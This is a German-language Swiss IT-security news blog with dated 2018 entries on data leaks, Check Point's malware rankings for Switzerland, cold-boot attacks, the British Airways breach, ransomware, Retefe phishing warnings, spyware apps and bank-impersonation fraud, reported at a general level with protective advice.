Der Forscher fand zudem Chat-Verläufe der Kunden mit ihren Beratern und jede Menge Passwörter; die der Kundendaten im Klartext und die der Administratoren - diese waren immerhin als Hashwerte gespeichert (bcrypt).

Heise will auch wissen, dass die App von einem externen Dienstleister in Indien entwickelt wurde. Woher das Portal dies weiss? Der Sicherheitsforscher fand gemäss Bericht noch mehr im AWS-Cloud-Ordner von Zufiso: haufenweise abfotografierte App-Entwürfe, Zeichnungen und Fotos der Entwickler in ihrem Studio im Norden Indiens.

Wie Zufiso gegenüber Heise sagt, ist die Sicherheitslücke in der App bereits behoben. Die Dateien seien nicht länger öffentlich einsehbar. Allerdings machte der Steuerberater offenbar keine Anstalten, seine Kunden über das Datenleck zu informieren.

14.09.2018 - 14:11 Uhr

Ein herrenloser Computerwurm meldet sich zurück

Bereits 2010 haben Cyberkriminelle den Computerwurm Ramnit auf die IT-Welt losgelassen. Sie verbreiteten den Wurm äusserst aggressiv. Den US-amerikanischen Strafverfolgungsbehörden war dies ein Dorn im Auge. Februar 2015 gingen sie deswegen im grossen Stil gegen die Drahtzieher vor – in Kooperation mit Symantec

Seitdem ist nicht mehr klar, ob überhaupt noch jemand die Zügel von Ramnit in den Händen hält. Dennoch taucht der Wurm immer wieder auf – zuweilen auch an ungewöhnlichen Stellen. So tauchte der PC-Wurm auch schon auf Smartphones auf. Vermutlich, weil App-Entwickler mit infizierten Geräten arbeiteten. Lesen Sie hier mehr dazu: Symantec findet uralten Wurm an ungewöhnlichen Stellen.

Auch in der Schweiz lässt Ramnit immer wieder von sich hören. So ist der Wurm etwa in der aktuellen "Most Wanted Malware"-Liste des israelischen Sicherheitsanbieters Check Point aufgetaucht. Demnach waren im Monat August 2,15 Prozent der Schweizer Unternehmen mit dem Wurm infiziert. Dies reichte für den sechsten Platz.

Die Top Malware in der Schweiz im August:

  1. Coinhive  (Crypto Miner – 11.74 Prozent der Schweizer Firmen)
  2. Emotet (Trojaner – 5,45 Prozent der Schweizer Firmen)
  3. Jsecoin (Crypto Miner – 3,14 Prozent der Schweizer Firmen)
  4. Nivdort (Trojaner – 2,48 Prozent der Schweizer Firmen)
  5. Roughted (Malvertising – 2,31 Prozent der Schweizer Firmen)
  6. Ramnit (Wurm – 2,15 Prozent der Schweizer Firmen)
  7. Scar (Trojaner – 1,49 Prozent der Schweizer Firmen)
  8. Virut (Bot – 1,16 Prozent der Schweizer Firmen)
  9. Andromeda  (Bot – 1,16 Prozent der Schweizer Firmen)
  10. Cryptoloot  (Crypto Miner – 1,16 Prozent der Schweizer Firmen)
  11. Dorkbot (Wurm – 1,16 Prozent der Schweizer Firmen)
  12. Fireball (Adware – 1,16 Prozent der Schweizer Firmen)

Ein Blick auf die Liste zeigt ferner, dass im vergangenen Monat vermehrt Unternehmen von Trojaner befallen wurden. Im Juli hatten die Trojaner Nivdort, Emotet und Scar noch gemeinsam rund 3,33 Prozent der Schweizer Unternehmen infiltriert. Im August kam Emotet im Alleingang schon auf 5,45 Prozent. Auch Nivdort legte deutlich zu.

Die Bedrohung Nummer 1 bleibt aber weiterhin Coinhive. Der Cryptominer stiehlt heimlich die Rechenleistung seiner Opfer, um nach Kryptowährungen zu schürfen. Im August baute das Schadprogramm seine Opferzahl sogar leicht aus: von 9,65 auf 11,74 Prozent. 

Die globale "Most Wanted Malware"-Liste findet sich im Blogeintrag von Check Point.

Trojaner, Ransomware und DDoS? Was war schon wieder was? Das kleine IT-Security-Glossar verschafft einen schnellen Überblick über die gängigsten Begriffe rund um Cybercrime und IT-Security - ohne Anspruch auf Vollständigkeit.

Das kleine IT-Security-Glossar
 

14.09.2018 - 14:04 Uhr

Weshalb auch Harddisk-Verschlüsselung vor dem Schlafmodus nicht schützt

Cold-Boot-Attacken, auch Kaltstarterangriffe genannt, sind in den vergangenen 10 Jahren leicht aus der Mode geraten. Bei dieser Methode muss sich ein Hacker physischen Zugang zu einem Rechner verschaffen mit der Absicht, den Arbeitsspeicher auszulesen.

Für die Attacke wird der Rechner kalt neugestartet – das heisst der Rechner war zuvor ohne Strom. Dabei verwendet der Angreifer ein minimales Betriebssystem, damit möglichst viel des Arbeitsspeichers unberührt bleibt.

Die Informationen im Arbeitsspeicher verflüchtigen sich erst ein paar Minuten. Mit einem Kältespray können die Angreifer wertvolle Zeit gewinnen. Das Flüssiggas in den Sprühdosen kann Speichermodule auf -25 bis -55 Grad abkühlen. So bleiben die Inhalte länger in den Speichermodulen erhalten.

Die Branche reagierte mit MORLock (Memory Overwrite Request Control) auf das Problem. Sobald das Sytem gestartet wird, löscht diese Firmware-Einstellung automatisch alle Inhalte im RAM-Speicher. Cold Boot Attacken gerieten danach langsam in Vergessenheit.

Bis jetzt. Die Sicherheitsforscher Olle Segerdahl und Pasi Saarinen von F-Secure zeigten eine neue Variante dieser Attacke. Diese soll gemäss dem Blogeintrag der Sicherheitsfirma mit fast allen modernen Laptops funktionieren – etwa mit den Notebooks von Apple, Dell und Lenovo. 

Die Methode zeigt, wie gefährlich der Schlafmodus dieser Geräte ist, sogar wenn man eine vollständige Harddisk-Verschlüsselung nutzt. Wenn der Laptop im Schlafmodus war, konnten die Forscher auch durch MORLock geschützte Geräte hacken. Zu diesem Zweck manipulierten die Sicherheitsforscher die Firmwareeinstellungen der Geräte im Schlafmodus.

"Es ist nicht gerade einfach", lässt sich Segerdahl in dem Blogeintrag zitieren, "aber es ist auch nicht so schwierig, dass wir die Möglichkeit ignorieren können, dass einige Hacker diesen Trick ebenfalls bereits entdeckt haben."

Derartige Angriffe würden wohl kaum bei Gelegenheitshacks zum Einsatz kommen. Aber vielleicht bei zielgerichteten Attacken. Wenn ein Banker oder CEO seinen Laptop etwa in einem Taxi vergisst, hätten die Angreifer auch genügend Zeit, um so eine Attacke durchzuführen. 

Die Experten raten IT-Verantwortlichen daher, Unternehmenslaptops so zu konfigurieren, dass sie nicht in den Schlafmodus wechseln, sondern sich abschalten. Zudem sollten sie sich bei jedem Neustart zunächst authentifizieren müssen. 

Das würde Cold-Boot-Attacken nicht verhindern. Wenn die Maschine herunterfährt, speichert sie aber die Entschlüsselungscodes nicht im Arbeitsspeicher. Die Hacker könnten also keine wertvollen Daten auslesen. 

Mehr dazu im Blogeintrag von F-Secure.

11.09.2018 - 18:14 Uhr

British Airways wollte IT-Security an IBM outsourcen – und wurde zuvor prompt gehackt

Böses Timing! Ende August haben Unbekannte die Fluggesellschaft British Airways gehackt. Die Hacker erbeuteten Kundendaten von rund 380'000 Personen – inklusive Zahlungs- und Kreditkarteninformationen. Und zur gleichen Zeit hatte die Fluggesellschaft versucht, ihre IT-Security an IBM auszulagern. 

Dies geht aus einem internen Memo hervor, das The Register vorliegt. Demzufolge wolle die Airline fast alle IT-Security-Prozesse abgeben. Nur der Bereich Security Operation Services sollte im Haus bleiben. Das Direktorium hatte dem Schritt Anfang August bereits zugestimmt. Nun sollten aber noch die Arbeitskräfte und Gewerkschaften ihr Einverständnis geben.

Doch daraus wurde nichts. Gerade mal fünf Wochen später wusste die Welt schon, dass British Airways ihre Kundendaten nicht schützen kann. Die Kriminellen hatten vom 21. August bis zum 5. September wohl mehr oder weniger freie Hand im Firmennetzwerk der Fluggesellschaft.

Die Ursache für die Sicherheitslücke dürften wohl kostensenkende Massnahmen sein, vermutet The Register. Aufgrund von Einsparungen wurden vermutlich Updates nicht getestet, bevor sie aufgeschaltet wurden, was das System unsicher machte. Vielleicht wurden die Server aber aus demselben Grund auch nicht gepatcht. 

British Airways will nach eigenen Angaben die Opfer des Hacks finanziell entschädigen. Die Fluggesellschaft wird nun aufgrund der neuen Datenschutz-Grundverordnung der EU (EU-DSGVO beziehungsweise GDPR) aber wohl noch mit derben Konsequenzen rechnen müssen. Wie es mit dem Outsoucring-Deal mit IBM weitergeht, steht noch in den Sternen.

 

11.09.2018 - 17:44 Uhr

Präsidiale Ransomware mit Heisshunger auf .exe-Dateien

Der ehemalige Präsident der USA, Barack Obama, hat einen neuen Namensvetter. Einen cyberkriminellen Namensvetter. Dabei handelt es sich um ein Schadprogramm mit dem illustren und einprägsamen Namen: Barack Obama’s Everlasting Blue Blackmail Virus.

Obwohl der Name etwas anderes vermuten lässt, handelt es sich dabei um eine Ransomware. Hat diese einen PC infiziert, schaltet sie zunächst diverse Prozesse ab, die mit Anti-Virus-Lösungen in Verbindung stehen. 

In einem nächsten Schritt analysiert das Schadprogramm den Rechner, sucht nach .exe-Dateien und verschlüsselt diese. Sämtliche .exe-Dateien, also auch diejenigen, die sich im Windows-Systemordner befinden. Für gewöhnlich meiden Ransomware diesen Ordner, um keine ungewollten Systemabstürze zu verursachen, wie Bleepingcomputer.com berichtet.

Die Ransomware ändert zudem die Icons und Registrierungsschlüssel der verschlüsselten Dateien, so dass stattdessen die Ransomware ausgeführt wird, wenn der Nutzer darauf klickt. Wer seine Dateien wieder zurück haben will, müsse sich an die angegebene E-Mail-Adresse wenden und ein Lösegeld zahlen.

 
 
 
 
 
 
 
 
 
 
 
 
 
 

Ein Beitrag geteilt von IT Security Blog (@itsecurityblog) am

Ob der Angreifer bei Bezahlung tatsächlich den Entzifferungsschlüssel herausrückt, ist gemäss dem Bericht noch unklar. Ebenfalls unklar ist, wie die Ransomware verbreitet wird. Übrigens hatte auch Donald Trump die fragwürdige Ehre, als unfreiwilliger Namensgeber für eine Ransomware herhalten zu müssen. Die Donald Trump Ransomware kursierte 2016 im Vorfeld der US-amerikanischen Präsidentschaftswahlen.

11.09.2018 - 17:18 Uhr

Melani warnt vor Wolf im WEF-Pelz

Der E-Banking-Trojaner Retefe kann es einfach nicht lassen. Das Schadprogramm geistert zwar schon seit Jahren in der Schweizer IT-Landschaft herum. Die ersten Opfer fand Retefe bereits 2013. In den vergangenen Wochen scheint die Malware jedoch besonders aktiv zu sein. 

Jede Woche erscheint eine neue Warnung der Melde- und Analysestelle Informationssicherung (Melani) über eine neue Spam-Kampagne. Die Drahtzieher hinter dem Banking-Trojaner wollen mit täuschend echt wirkenden E-Mails ihre Opfer dazu bringen, die Makros im angehängten Word-Dokument zu öffnen. Hierzu verwenden die Cyberkriminellen die Logos bekannter Firmen und Organisationen. Die aktuelle Kampagne nutzt etwa den Auftritt des Wirtschaftsforums WEF. 

 

 

Wer die Makros im Anhang aktiviert, öffnet bloss Retefe das Tor zum eigenen Rechner. Melani empfiehlt daher, die E-Mails zu löschen und den Anhang nicht zu öffnen. Die falsche WEF-Kampagne grassiert gemäss Melani in der Romandie. 

28.08.2018 - 11:27 Uhr

Melani warnt schon wieder – falsche Zurich-Mails im Umlauf

Kaum eine Woche ist vergangen, seitdem die Melde- und Analysestelle Informationssicherung (Melani) vor betrügerischen E-Mails gewarnt hat, die angeblich von der Schweizerischen Post kommen (Siehe Blogeintrag vom 22. August). Nun folgt bereits der nächste Alarm.

Diese neue Spam-Welle versucht dem Empfänger vorzutäuschen, dass das Schreiben von Zurich Versicherung kommt. Tatsächlich wollen die Betrüger mit den E-Mails jedoch den E-Banking-Trojaner Retefe verbreiten, wie Melani über den Twitter-Account des Government Computer Emergency Response Team (GovCERT) mitteilt. 

Der Trojaner versteckt sich im Anhang – eine .doc-Datei, die wohl mit schädlichen Makros vollbeladen ist. Betroffene sollen gemäss der Warnung den Anhang nicht öffnen und das E-Mail löschen.

Retefe gehört zum alten Eisen im Cybercrime und ist schon seit Anfang November 2013 in der Schweiz aktiv. Der E-Banking-Trojaner ist einer der aggressivsten Schadprogramme hierzulande – aber auch fast nur in der Schweiz. Die Malware ist in nur wenigen Ländern aktiv: Neben der Schweiz sind dies lediglich noch Österreich, Schweden und Japan. 

Einmal im Rechner drin, leitet Retefe den Browser seiner Opfer um. Wenn diese bestimmte E-Banking-Portale nutzen, erhalten sie stattdessen die Aufforderung, eine App herunterzuladen – angeblich um die Sicherheit zu erhöhen. Tatsächlich handelt es sich dabei aber um ein Android-Schadprogramm. Dieses fängt sämtliche SMS von der Bank für die 2-Faktor-Authentifizierung von der Bank ab und leitet sie an die Hacker weiter.

28.08.2018 - 11:20 Uhr

Warum eine smarte Beleuchtung auch sehr dumm sein kann

Viele Wege führen nach Rom – und noch mehr führen aus einem Unternehmen hinaus. Sicherheitsforscher finden immer neue Methoden, Daten unbemerkt aus einem Unternehmen zu exfiltrieren. Unlängst ging einem Forschungsteam von der University of Texas at San Antonio wohl ein Lichtlein auf. Denn sie kamen auf die Idee, gestohlene Daten von Smartphones über smarte Glühbirnen aus einem Unternehmen heraus zu schmuggeln.

Die Angriffsmethode ist sehr theoretisch – aber eben: theoretisch möglich. Das Opfer muss dafür smarte Glühbirnen im Büro oder bei sich daheim installiert haben, die Infrarot-Licht unterstützen. Zudem dürfen sie keine Autorisierung verlangen, wenn eine Applikation die Glühbirne über das Netzwerk anzusteuern versucht. Die letzte Zutat: eine Malware auf dem Smartphone des Opfers. Das Schadprogramm wandelt Daten in Lichtsignale um und sendet diese an die Glühbirne. Im Test nutzten die Forscher Glühbirnen der Marke LIFX.

Zu diesem Zweck spielt die Malware mit der Amplitude und der Länge der Lichtwellen – sowohl im sichtbaren als im nichtsichtbaren Bereich. In dem Testversuch kodierte das Forschungsteam ein Bild in Lichtsignalen. Diese fingen sie auf verschiedenen Distanzen mit einem Teleskop ab.

Auf einer Distanz von 5 Metern zur Lichtquelle war das Bild nur unwesentlich verfälscht. Mit zunehmender Distanz nahm auch das Bildrauschen zu. Allerdings war das Bild auch bei einer Distanz von 50 Metern zwischen Glühbirne und Empfänger noch klar immer erkennbar. 

Wie man sich dagegen schützen kann? Ein paar Vorhänge könnten schon reichen, schreibt das Team in der Forschungsarbeit (Link zum PDF). Es müssten aber möglichst opak sein – je weniger Licht sie durchlassen, desto schwieriger wird es, dass dieses Licht Daten hinaus trägt. 

28.08.2018 - 11:05 Uhr

Swisscom sucht einen Cybersecurity-Experten

Das Computer Security Incident Response Team von Swisscom (CSIRT) sucht Nachwuchs. Wie der Telko auf seiner Website schreibt, sucht das Security-Team einen Senior Security Incident Responder in Zürich oder Bern-Worblaufen. Das Pensum beträgt gemäss dem Stelleninserat 80 bis 100 Prozent.

Bewerber müssen einen Uni-Abschluss in Informatik oder einen gleichwertigen technischen Abschluss mitbringen und über ein breites Fachwissen in verschiedenen Technologien verfügen (etwa Unix, Windows, Mac, Netzwerke, Middleware, Mobile). Wichtig sei zudem auch ein strategisches, analytisches sowie vorausschauendes und vernetztes Denken. 

Mehr Informationen gibt es hier.

 

22.08.2018 - 13:29 Uhr

Melani schlägt Alarm wegen falschen Post-E-Mails

Der E-Banking-Trojaner Retefe schlägt zurück – schon wieder. Die Melde- und Analysestelle Informationssicherung (Melani) warnt auf Twitter vor E-Mails, die angeblich von der Post kommen. Wie dem Screenshot zu entnehmen ist, wirken die E-Mails täuschend echt. Die Betrüger geben darin vor, es sei ein Paket unterwegs und geben Sendungsnummer, Art der Zustellung, Absender und mehr an.

Ein irritierter Nutzer mag wohl auf den Anhang klicken, um mehr herauszufinden. Zusammen mit der E-Mail kommt nämlich auch eine angehängte Doc-Datei. Von dieser soll man jedoch lieber die Finger lassen. 

Wer das Dokument öffnet, sieht zunächst einmal gar nichts. Die installierte Version von Microsoft Word sei nicht kompatibel mit dem Dokument. Der Nutzer solle doch auf "Bearbeitung aktivieren" und anschliessend auf "Inhalt aktivieren" klicken.

 

 

Folgt ein Nutzer dieser Anweisung, aktiviert er die Makros in Word. Und so gibt er der gefährlichen Nutzlast freien Zugang auf den Rechner. Die Mails dienen nämlich dazu, den E-Banking-Trojaner Retefe zu verbreiten. Die Betrüger versuchen so an die Zahlungsinformationen ihrer Opfer heranzukommen.

Dass die E-Mail nicht von der Post kommt, erkennt man an den Details. So ist das Anschreiben etwa generisch und nicht persönlich. Der Name des Empfängers fehlt. Auch ist der Absender nicht mit der Domain Post.ch verbunden – der Absender im Screenshot ist noch nicht mal eine Schweizer Adresse. 

Die Malware ist schon seit Jahren in der Schweiz aktiv. So warnte Melani etwa bereits vergangenen Oktober vor einer Spam-Kampagne, die ebenfalls versuchte, Retefe zu verbreiten. Lesen Sie mehr zu Retefe im aktuellen Halbjahresbericht von Melani.

 

 

17.08.2018 - 19:52 Uhr

Crypto-Miner-Plage befällt Schweizer Unternehmen

Sie sind quasi die Mücken des Cybercrime: Crypto Miner. Kleine, unscheinbare Parasiten, die sich fast überall verstecken können. Im Februar dieses Jahres tauchten derartige Schädlinge sogar in Youtube-Werbeanzeigen auf. Die Malware zapft die Rechenleistung ihrer Opfer an, um damit nach Kryptowährungen zu schürfen und so Geld für die Cyberkriminellen zu generieren. 

Auch Schweizer Firmen kämpfen schon seit einiger Zeit mit dieser Plage. Im vergangenen Monat intensivierte sich das Problem jedoch etwas, wie die Most Wanted Malware Liste von Check Point für den Monat Juli zeigt. Der israelische Sicherheitsanbieter aktualisiert die Liste jeden Monat.

Dass die Liste vom Crypto Miner Coinhive angeführt wird, ist nichts Neues – im Juli waren gemäss Check Point fast 10 Prozent aller Schweizer Unternehmen davon betroffen. Im Vergleich zum Vormonat hat es sogar einen Crypto Miner weniger auf der Liste. XMRig blieb auf der Strecke. 

Aber dafür kletterten die beiden schürfenden Parasiten Cryptoloot und Jsecoin weit hinauf auf der Liste. Im Juni lag Cryptoloot noch auf dem 4. und Jsecoin auf dem 9. Platz. In der aktuellen Liste schaffte es Cryptoloot auf den 2. Platz. Jsecoin machte vier Plätze gut und landete auf dem 5. Rang. 

Die Top Malware in der Schweiz im Juli:

  1. Coinhive (Crypto Miner – 9,65 Prozent der Schweizer Firmen)
  2. Cryptoloot (Crypto Miner – 3,53 Prozent der Schweizer Firmen)
  3. Roughted ((Malvertising – 3,53 Prozent der Schweizer Firmen)
  4. Andromeda (Bot – 1,86 Prozent der Schweizer Firmen)
  5. Jsecoin (Crypto Miner – 1,86 Prozent der Schweizer Firmen)
  6. Dorkbot (Wurm – 1,67 Prozent der Schweizer Firmen)
  7. Virut (Botnet – 1,30 Prozent der Schweizer Firmen)
  8. Nivdort (Trojan – 1,11 Prozent der Schweizer Firmen)
  9. Emotet (Trojaner – 1,11 Prozent der Schweizer Firmen)
  10. Scar (Trojaner – 1,11 Prozent der Schweizer Firmen)

Die globale "Most Wanted Malware"-Liste findet sich im Blogeintrag von Check Point.
 

17.08.2018 - 19:46 Uhr

Fake Bugs sollen vor echten Bugs schützen

Um Benutzer vor Schadprogrammen zu schützen, kommen Sicherheitsforscher manchmal auf ungewöhnliche Ideen. Die folgende Technik eines Teams der New York University gehört definitiv in die Kategorie «So unorthodox, dass es vielleicht funktionieren könnte». Sie wollen selbst Programme mit Bugs verseuchen. Mit möglichst vielen Bugs.

Ein voreiliger Hacker könnte jetzt schon ein «Danke!» auf den Lippen haben. Schliesslich leben sie davon, solche Sicherheitslücken zu finden und auszunutzen. Exploits für Bugs lassen sich etwa verkaufen. Seriöse Sicherheitslücken erlauben dem Cyberkriminellen vielleicht sogar Zugriff auf Firmennetzwerke und Unternehmensdaten.

Die absichtlich eingebauten Bugs – die Forscher nennen sie "Chaff Bugs" - sollen aber als Ablenkung dienen. Die vermeintlichen Schwachstellen sollen natürlich nicht ausnutzbar sein, sondern auf Cyberkriminelle nur so wirken. Der Hacker, so die Idee hinter der Taktik, vergeudet seine Zeit damit, Exploits für nicht ausnutzbare Schwachstellen zu entwickeln. 

Ganz ohne Probleme ist die Idee jedoch nicht. Gemäss den Forschern könnten auch falsche Bugs zu echten Systemabstürzen führen. Auch können die Forscher nicht garantieren, dass Cyberkriminelle irgendwann einen Weg herausfinden, Chaff Bugs von echten Bugs zu unterscheiden. Auch sei diese Methode nicht möglich in Open-Source-Lösungen. 

Die Idee bleibt jedoch interessant.

In ihrer Forschungsarbeit “Chaff Bugs: Deterring Attackers by Making Software Buggier” (PDF) beschreiben die Sicherheitsforscher ausführlich, wie ihre Taktik funktionieren soll. 

17.08.2018 - 19:28 Uhr

Science-Fiction lügt - wieder mal

Die Stimme als biometrischen Passwortersatz zu verwenden gehört zu den grundlegenden Stereotypen des Science-Fiction-Genres. Von Captain Jean-Luc Picard bis Detektiv John Miller – alle können ihre Rechner und Dateien mit gesprochenen Befehlen ver- und entschlüsseln. 

Science-Fiction-Filme und -Serien stellen Stimm-Passwörter als naheliegende Zukunftsvision dar, in welcher der Nutzer vom unnötigen Tippen befreit worden ist. Die Realität könnte jedoch einen grossen Bogen um solche Technologien machen wollen. 

Die Sicherheitsexperten John Seymour und Azeem Aqil zeigten an der Hackerkonferenz Def Con nämlich, wie leicht sich Stimmerkennungsverfahren täuschen lassen. Mit synthetisch erzeugten Stimmen konnten sie Apples Siri und auch Azure Speaker Recognition von Microsoft austricksen, wie Heise berichtet

Die Stimmen erzeugten sie mit dem Text-to-Speech-Verfahren (TTS). Hierbei werden grosse Mengen an Sprachaufzeichnungen genutzt und neu zusammengesetzt, um neue Sprachausgaben zu generieren. In der Regel sind hierfür Sprachproben von mehreren Stunden nötig. 

Die Forscher brauchten jedoch nur 10 Minuten. Diese zerstückelten sie in zehn Sekunden lange Fetzen und verlängerten sie künstlich. Mit diesen Fetzen trainierten sie ein neuronales Netzwerk, das gemäss dem Bericht anschliessend täuschend echte Sprachproben produzieren konnte.
 

17.08.2018 - 18:29 Uhr

Swisscom warnt vor Phising-Attacke via Linkedin

Das Computer Security Incident Response Team der Swisscom (CSIRT) hat auf Twitter vor Betrügern gewarnt. Die Betrüger versuchen mit einer Phishing-Attacke an die Zugangsdaten ihrer Opfer zu kommen, wie Swisscom mitteilt. 

Hierfür verwenden sie kompromittierte Benutzerkonten auf der Social-Media-Plattform Linkedin. Die Phishing-Attacken erfolgen über Direktnachrichten. Wenn Opfer auf den darin enthaltenen Link klicken, werden sie auf eine Website mit schädlichem Inhalt geleitet. 

 

 

17.08.2018 - 18:17 Uhr

DOS-Wurm taucht auch nach 36 Jahren noch auf

Die BBC hat sich mit den Zombies des Internets beschäftigt. Uralte Codezeilen, die noch immer herumgeistern und gelegentlich frische Opfer finden. Viren, aber vor allem Würmer, leben oft viel länger als die Kampagnen, in denen sie verbreitet werden.

"Die meisten dieser Würmer verbreiten sich selbstständig weiter", zitiert die BBC Candid Wüest, Senior Threat Researcher bei Symantec. Sobald diese Würmer einen Rechner infiziert haben, verfügen sie über alle Mittel, die sie brauchen, um sich auf weiteren PCs einzunisten. Daher rührt auch ihre Langlebigkeit. 

Zu den aktivsten Zombie-Würmern gehört Conficker. Dieser befällt schon seit 2008 IT-Systeme. Symantec findet aber auch regelmässig noch ältere Zombies: Darunter etwa das SillyFDC-Virus von 2007, Virut von 2006 und ein Schadprogramm namens Sality, das erstmals 2003 auftauchte. 

Zu den alten Eisen gehört auch Ramnit – ein Wurm, der schon seit sieben Jahren sein Unwesen treibt. Symantec hatte Ende 2017 darauf hingewiesen. Lesen Sie mehr dazu hier

"Von Zeit zu Zeit sehen wir sogar DOS-Viren", sagt Wüest gegenüber der BBC. Das DOS-Betriebssystem ist mittlerweile über 36 Jahre alt und geht auf die Anfangszeit des PCs zurück. Wüest vermutet, dass es sich dabei wohl um Forscher handelt, die eine alte Disk fanden und einsteckten. 

Mehr zu Malware-Antiquitäten auf der Seite von BBC.


 

08.08.2018 - 13:50 Uhr

Was passiert, wenn man Ransomware-Autoren erzürnt?

Die Ransomware Gandcrab hat in diesem Jahr eine Vielzahl Systeme befallen - bis ein südkoreanischer IT-Security-Anbieter ihr am 19. Juli die Zähne zog. Ahnlab, so der Name des südkoreanischen Unternehmens, veröffentlichte ein Tool, das die Ransomware daran hindert, Dateien zu verschlüsseln, wie Bleepingcomputer berichtet.

Nach einer erfolgreichen Infektion kreiert Gandcrab eine bestimmte Datei mit der Endung .lock. Der Name der Datei ist ein hexadezimaler Code, welcher auf Informationen zum Festplattenlaufwerk basiert. So weiss die Ransomware, ob ein Rechner bereits verschlüsselt ist oder nicht. Das Tool von Ahnlab kreiert just so eine Datei, wenn es eine Infektion durch Gandcrab erkennt und stoppt die Ransomware, bevor sie loslegen kann.

Der Autor der Gandcrab-Ransomware war über diese Entwicklung – verständlicherweise – nicht sonderlich erfreut. Der Cyberkriminelle kontaktierte Bleepingcomputer und kündigte neue Ausführungen seiner Ransomware an. Diese würden angeblich eine Zero-Day-Lücke in der Anti-Virus-Lösung von Ahnlab ausnützen. Die Rache für das Tool sollte den Ruf der Südkoreaner über Jahre hinweg schädigen.

Anfang August entdeckte der IT-Security-Analyst Marcelo Rivero von Malwarebytes die neue Version. Sie war bereits im Umlauf – inklusive des Ahnlab-Exploits. Das südkoreanische Unternehmen blieb jedoch unbesorgt. 

Der Exploit funktioniert zwar. Der Gandcrab-Autor erweiterte seine Ransomware mit einem Denial-of-Service-Bug, welcher die Anti-Virus-Lösung, einzelne Komponenten der Lösung oder auch den ganzen Rechner zum Absturz bringen könnte. 

Allerdings wird dieser Angriffscode erst aktiviert, nachdem Gandcrab die Dateien auf dem Rechner verschlüsselt hat, wie Han Chang-kyu, Director von Ahnlab, gegenüber Bleepingcomputer erklärt. Ihr Tool stoppt Gandcrab jedoch, bevor es überhaupt so weit kommt. 

Das Unternehmen nehme sich daher nun die nötige Zeit, ihre Lösung ordentlich zu patchen. 

12.07.2018 - 17:05 Uhr

Die Folgen von Cybercrime in der physischen Welt

11.07.2018 - 18:25 Uhr

Wurminfektion frisst sich durch Schweizer IT

Der Monat Juni hat der Schweiz nicht nur den Sommer gebracht – sondern auch Computerwürmer. Dies zeigt eine Übersicht von Check Point. Der israelische Sicherheitsanbieter analysiert jeden Monat die Top-Malware in der Schweiz. 

Im Mai war lediglich ein einzelner Wurm auf der Liste: Dorkbot, ganz am unteren Ende der Liste. Dabei handelt es sich laut Check Point um einen Internet-Relay-Chat-Wurm. Also ein schadhaftes Programm, das sich via IRC-Message-Foren verbreitet. Im Juni kletterte der Wurm auf Platz 6 der Top-Liste hinauf.

Diesen Monat gesellte sich noch ein weiterer Wurm dazu. Ein alter Bekannter. Ein sehr alter Bekannter! Der uralte Wurm Ramnit ist neu auf Rang 7. Der Wurm treibt sich schon seit über sieben Jahren auf PCs herum – und wurde im November auch auf Android-Geräten entdeckt. Lesen Sie mehr dazu hier

 

 

Beide Würmer können als Backdoor genutzt werden. Das heisst, dass Angreifer auf den infizierten Rechnern weitere Schadprogramme installieren können. In der Regel sollen so etwa Zugangsdaten oder E-Banking-Informationen gestohlen werden. Dorkbot vernetzt seine Opfer zusätzlich noch zu einem Botnetz, um etwa DDoS-Attacken zu lancieren. 

Obwohl der Crypto Miner Coinhive weiterhin die Liste anführt, war der vergangene Juni kein guter Monat für diese Form von Malware. Cryptoloot, Jsecoin und XMRig purzelten alle hinunter. Diese Schädlinge zapfen die Rechenleistung ihrer Opfer an, um nach Kryptowährungen zu schürfen.

Die Top Malware in der Schweiz im Juni:

  1. Coinhive (Crypto Miner)
  2. Emotet (Trojaner)
  3. Roughted ((Malvertising)
  4. Cryptoloot (Crypto Miner)
  5. Nivdort (Trojan)
  6. Dorkbot (Wurm)
  7. Ramnit (Wurm)
  8. Scar (Trojaner)
  9. Jsecoin (Crypto Miner)
  10. XMRig (Crypto Minter)

Die globale "Most Wanted"-Liste findet sich im Blogeintrag von Check Point.

11.07.2018 - 18:05 Uhr

Fussball-App belauscht israelische Soldaten

Fussball bringe die Menschen zusammen, sagt man. So auch Hacker und Opfer, wie das Beispiel einer falschen App zur aktuellen Fussball-Weltmeisterschaft namens Golden Cup zeigt. Dahinter stecke die islamistische Terrororganisation Hamas, teilt der israelische Sicherheitsanbieter Check Point mit. 

Auf diese Weise soll die Hamas versucht haben, die Smartphones von israelischen Soldaten zu infizieren. Bei rund 100 Soldaten sei dies auch geglückt. Check Point beschreibt die Apps als hochgradig invasiv. Die Malware könne etwa 

  • Telefonate aufnehmen
  • heimlich Fotos machen, wenn das Opfer angerufen wird
  • SMS-Nachrichten stehlen
  • alle Dateien, Bilder und Videos auf dem Gerät stehlen
  • die GPS-Informationen ablesen
  • Tonaufnahmen machen

Neben der WM-App hatte sich die Malware auch in Dating-Applikationen eingenistet. Die boshaften Apps waren gemäss Check Point im offiziellen Google Play Store erhältlich. Weil sich die Malware in legitim scheinenden Apps mit Bezug zu aktuellen Grossereignissen versteckt hatte, konnte sie Googles Schutzmechanismen umgehen. 

Die Masche ist nicht neu, wie Check Point schreibt. 2017 versuchte die Spyware Viperat israelische Soldaten im Gazastreifen zu bespitzeln. Im März 2016 sollen pakistanische Akteure mit der Messaging-App Smeshapp versucht haben, Angehörige des indischen Militärs zu belauschen. 

Mehr zu Golden Cup gibt es auf der Website von Check Point.

06.07.2018 - 16:59 Uhr

Melani warnt Schweizer Firmen vor falschen Bankern

Die Melde- und Analysestelle Informationssicherung (Melani) warnt Schweizer Firmen vor Betrugsversuchen. In den letzten Tagen sind vermehrt Vorfälle gemeldet worden, wie Melani mitteilt. 

Die Masche ist bekannt: Unbekannte rufen bei potenziellen Opferfirmen an und geben sich als Mitarbeiter ihrer Bank aus. Sie versuchen ihre Opfer zu überzeugen, eine Fernzugriffssoftware wie etwa Teamviewer zu installieren – alles unter dem Vorwand, ein Update beim E-Banking durchführen zu müssen.

Anschliessend gaukeln die Angreifer ihren Opfern vor, sie müssten das Update nun testen. Dafür müssten die Opfer die Zugangsdaten des Unternehmens eintippen. Sollten Zahlungen durch ein Kollektiv geschützt sein, versuchen die Angreifer alle Unterschriftsberechtigten zusammentrommeln zu lassen. 

Zwei Varianten der Masche

Verschiedentlich versuchen die Angreifer auch mit einer anderen Taktik ihre Opfer hinters Licht zu führen. Der Vorwand ist wieder ein Update beim E-Banking. Doch in dieser Variante geben die Angreifer vor, das Unternehmen müsse aufgrund eines Updates während einiger Tage auf das E-Banking verzichten. Bei dringenden Transaktionen solle die Firma sich telefonisch melden -  auf eine Rufnummer, welche die Betrüger angeben. 

